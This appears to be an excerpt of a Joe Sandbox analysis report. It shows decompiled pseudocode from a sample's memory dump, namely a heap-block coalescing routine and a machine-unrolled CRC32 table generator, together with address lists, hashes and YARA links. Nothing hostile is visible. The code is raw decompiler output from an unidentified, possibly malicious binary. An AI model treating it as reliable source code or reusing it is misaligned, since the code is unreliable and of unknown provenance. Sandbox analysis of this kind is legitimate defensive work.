							_t221 =  !(0x80000000 >> _t250);
							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
							 *_t270 =  *_t270 - 1;
							if( *_t270 == 0) {
								 *_a4 =  *_a4 & _t221;
							}
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
					_v8 = _v8 + _a12 - _t292;
					if(_v8 <= 0) {
						_t277 = _a8;
					} else {
						_t290 = (_v8 >> 4) - 1;
						_t256 = _a8 + _t292 - 4;
						if(_t290 > 0x3f) {
							_t290 = 0x3f;
						}
						_t207 = _v16 + _t290 * 8;
						_a12 = _t207;
						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
						_t209 = _a12;
						 *(_t256 + 8) = _t209;
						 *((intOrPtr*)(_t209 + 4)) = _t256;
						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
							_a15 = _t258;
							_t259 = _t258 + 1;
							 *((char*)(_t290 + _t186 + 4)) = _t259;
							if(_t259 >= 0) {
								__eflags = _a15;
								if(_a15 == 0) {
									_t84 = _t290 - 0x20; // -33
									_t262 = _a4;
									_t86 = _t262 + 4;
									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
									__eflags =  *_t86;
								}
								_t193 = _t186 + 0xc4 + _t274 * 4;
								_t91 = _t290 - 0x20; // -33
								_t260 = _t91;
								_t278 = 0x80000000;
							} else {
								if(_a15 == 0) {
									 *_a4 =  *_a4 | 0x80000000 >> _t290;
								}
								_t193 = _t186 + 0x44 + _t274 * 4;
								_t278 = 0x80000000;
								_t260 = _t290;
							}
							 *_t193 =  *_t193 | _t278 >> _t260;
						}
						_t277 = _a8;
						_t257 = _v8;
						_t192 = _t277 + _t292 - 4;
						 *_t192 = _t257;
						 *(_t257 + _t192 - 4) = _t257;
					}
					_t191 = _t292 + 1;
					 *((intOrPtr*)(_t277 - 4)) = _t191;
					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
					goto L52;
				}
			}
























































                              0x004162ac
                              0x004162b5
                              0x004162c0
                              0x004162c3
                              0x004162c6
                              0x004162d8
                              0x004162de
                              0x004162e1
                              0x004162e4
                              0x004162e8
                              0x004162ec
                              0x004162ef
                              0x00416454
                              0x0041645a
                              0x0041645d
                              0x00416460
                              0x00416463
                              0x00416466
                              0x0041646d
                              0x00416473
                              0x00416474
                              0x00416477
                              0x0041647a
                              0x0041647e
                              0x0041647e
                              0x0041647f
                              0x00416483
                              0x0041648f
                              0x00416490
                              0x00416493
                              0x00416497
                              0x00416497
                              0x0041649b
                              0x0041649e
                              0x004164a0
                              0x004164a3
                              0x004164c3
                              0x004164cd
                              0x004164cd
                              0x004164d1
                              0x004164d3
                              0x004164da
                              0x004164da
                              0x004164dc
                              0x004164de
                              0x004164e1
                              0x004164e1
                              0x004164e1
                              0x004164e1
                              0x004164a5
                              0x004164ae
                              0x004164b2
                              0x004164b4
                              0x004164b8
                              0x004164b8
                              0x004164ba
                              0x004164bf
                              0x004164bf
                              0x004164ba
                              0x004164e4
                              0x004164e4
                              0x004164ed
                              0x004164f6
                              0x004164fc
                              0x004164ff
                              0x00416505
                              0x00416506
                              0x00416509
                              0x0041650d
                              0x0041650d
                              0x00416509
                              0x0041650e
                              0x00416515
                              0x00416518
                              0x0041651b
                              0x0041651e
                              0x00416524
                              0x0041652a
                              0x0041652d
                              0x0041652f
                              0x00416533
                              0x00416536
                              0x00416539
                              0x00416539
                              0x0041653b
                              0x0041653f
                              0x00416562
                              0x00416566
                              0x00416572
                              0x00416575
                              0x00416575
                              0x00416575
                              0x00416575
                              0x00416578
                              0x0041657f
                              0x00416582
                              0x00416541
                              0x00416541
                              0x00416545
                              0x00416550
                              0x00416553
                              0x00416553
                              0x00416553
                              0x00416555
                              0x00416559
                              0x0041655e
                              0x0041655e
                              0x00416589
                              0x00416589
                              0x00416589
                              0x0041658b
                              0x0041658e
                              0x00416590
                              0x00416590
                              0x00416594
                              0x00416596
                              0x00000000
                              0x00416596
                              0x004162f8
                              0x00000000
                              0x00416308
                              0x0041630e
                              0x00416312
                              0x00416315
                              0x00416319
                              0x0041631a
                              0x0041631a
                              0x00416323
                              0x00416328
                              0x00416356
                              0x0041635a
                              0x0041635c
                              0x00416363
                              0x00416363
                              0x00416365
                              0x00416367
                              0x0041636a
                              0x0041636a
                              0x0041636a
                              0x0041636a
                              0x0041632a
                              0x00416334
                              0x00416338
                              0x0041633a
                              0x0041633e
                              0x00416340
                              0x00416345
                              0x00416345
                              0x00416340
                              0x00416328
                              0x00416373
                              0x0041637c
                              0x00416384
                              0x0041638b
                              0x0041643b
                              0x00416391
                              0x0041639a
                              0x0041639b
                              0x004163a2
                              0x004163a6
                              0x004163a6
                              0x004163aa
                              0x004163ad
                              0x004163b3
                              0x004163b6
                              0x004163b9
                              0x004163bc
                              0x004163c2
                              0x004163cb
                              0x004163cd
                              0x004163d4
                              0x004163d7
                              0x004163d9
                              0x004163dd
                              0x00416400
                              0x00416404
                              0x00416406
                              0x00416410
                              0x00416413
                              0x00416413
                              0x00416413
                              0x00416413
                              0x00416416
                              0x0041641d
                              0x0041641d
                              0x00416420
                              0x004163df
                              0x004163e3
                              0x004163f1
                              0x004163f1
                              0x004163f3
                              0x004163f7
                              0x004163fc
                              0x004163fc
                              0x00416427
                              0x00416427
                              0x00416429
                              0x0041642c
                              0x0041642f
                              0x00416433
                              0x00416435
                              0x00416435
                              0x0041643e
                              0x00416441
                              0x00416444
                              0x00000000
                              0x00416444

                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                              • Instruction ID: ff32ffadf5a964956f90e5d4d875ac86f6d3b74cc38b5144254d495ff0ae7514
                              • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                              • Instruction Fuzzy Hash: D3B18E75A0020ADFDB15CF04C5D0AE9BBA2BF58318F25C19EC85A4B346C735EE82CB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00403A01 Relevance: .1, Instructions: 82COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00403A01() {
				void* _t37;
				signed int _t38;
				signed int _t72;

				_t72 = 0;
				do {
					 *(0x4236c0 + _t72 * 4) =  !((( !((( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001;
					_t72 = _t72 + 1;
				} while (_t72 < 0x100);
				while(_t72 < 0x800) {
					_t38 =  *(0x4232c0 + _t72 * 4);
					_t72 = _t72 + 1;
					 *(0x4236bc + _t72 * 4) = _t38 >> 0x00000008 ^  *(0x4236c0 + (_t38 & 0x000000ff) * 4);
				}
				 *0x42333c = 0x418fd0;
				_t37 = E00411420();
				if(_t37 == 0) {
					 *0x42333c = 0x418ef0;
					return _t37;
				}
				return _t37;
			}






                              0x004133d0
                              0x004133d2
                              0x00413460
                              0x00413467
                              0x00413468
                              0x0041347a
                              0x00413480
                              0x00413499
                              0x0041349a
                              0x004134a1
                              0x004134a9
                              0x004134b3
                              0x004134ba
                              0x004134bc
                              0x00000000
                              0x004134bc
                              0x004134c6

                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID:
